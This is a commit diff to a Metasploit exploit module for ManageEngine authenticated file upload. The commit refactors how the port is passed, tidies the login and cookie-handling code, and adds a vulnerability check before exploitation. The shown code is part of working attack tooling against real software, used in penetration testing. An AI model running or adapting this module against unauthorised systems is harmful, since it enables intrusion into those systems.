Avoid modify datastore options

2015-01-19 17:11:31 -06:00 · 2015-01-19 17:11:31 -06:00 · ed26a2fd77
parent 3c0efe4a7e
commit ed26a2fd77
1 changed files with 16 additions and 13 deletions
--- a/modules/exploits/multi/http/manageengine_auth_upload.rb
+++ b/modules/exploits/multi/http/manageengine_auth_upload.rb
@ -163,29 +163,25 @@ class Metasploit3 < Msf::Exploit::Remote
      }
    else
      vars_post = {
-          'LOGIN_ID' => username,
-          'PASSWORD' => password,
-          'isADEnabled' => 'true',
-          'domainName' => datastore['DOMAIN_NAME']
+        'LOGIN_ID' => username,
+        'PASSWORD' => password,
+        'isADEnabled' => 'true',
+        'domainName' => datastore['DOMAIN_NAME']
      }
    end

-    sd_port = datastore['RPORT']
-    datastore['RPORT'] = port
-
    res = send_request_cgi({
+      'rport'  => port,
      'method' => 'POST',
-      'uri' => normalize_uri(path),
+      'uri'    => normalize_uri(path),
      'vars_get' => {
-        'service' => 'ServiceDesk',
-        'furl' => '/',
+        'service'   => 'ServiceDesk',
+        'furl'      => '/',
        'timestamp' => Time.now.to_i
      },
      'vars_post' => vars_post
    })

-    datastore['RPORT'] = sd_port
-
    if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
      # /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
      return res.get_cookies
@ -211,7 +207,7 @@ class Metasploit3 < Msf::Exploit::Remote

  def login_it360
    # Do we already have a valid cookie? If yes, just return that.
-    if datastore['IAMAGENTTICKET'] != nil
+    if datastore['IAMAGENTTICKET']
      cookie_name = get_it360_cookie_name
      cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
      return cookie
@ -230,6 +226,7 @@ class Metasploit3 < Msf::Exploit::Remote
    end

    cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
+
    if cookie != nil
      return cookie
    elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
@ -371,6 +368,11 @@ class Metasploit3 < Msf::Exploit::Remote


  def exploit
+    if check == Exploit::CheckCode::Safe
+      fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
+    end
+
+    print_status("#{peer} - Selecting target...")
    @my_target = pick_target
    print_status("#{peer} - Selected target #{@my_target.name}")

@ -379,6 +381,7 @@ class Metasploit3 < Msf::Exploit::Remote
    else
      cookie = login
    end
+
    if cookie == nil
      fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
    end